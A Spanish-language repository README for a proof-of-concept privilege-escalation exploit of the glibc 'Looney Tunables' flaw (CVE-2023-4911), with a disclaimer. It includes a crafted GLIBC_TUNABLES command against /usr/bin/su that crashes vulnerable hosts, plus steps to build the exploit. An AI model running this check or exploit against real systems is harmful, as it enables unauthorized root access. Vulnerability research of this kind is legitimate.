
Exploit de prueba de concepto para CVE-2023-4911 (Looney Tunables), que apunta a un desbordamiento de búfer en el análisis de GLIBC_TUNABLES de glibc. Incluye detección de vulnerabilidad y un exploit compilado para escalada de privilegios.
Este es un PoC de CVE-2023-4911 (también conocido como "Looney Tunables") que explota un error en la función de análisis de la variable de entorno GLIBC_TUNABLES del cargador dinámico de glibc, parse_tunables().
env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help
Segmentation fault (core dumped) entonces estamos ante un objetivo vulnerable.libc.so.6python3 libc.py
gcc exp.c -o exp
Todo el código proporcionado en este repositorio es solo con fines educativos/de investigación. Cualquier acción y/o actividad relacionada con el material contenido en este repositorio es únicamente responsabilidad suya. El uso indebido del código en este repositorio puede resultar en cargos penales contra las personas en cuestión. El autor no se hará responsable en caso de que se presenten cargos penales contra cualquier persona que utilice indebidamente el código de este repositorio para infringir la ley.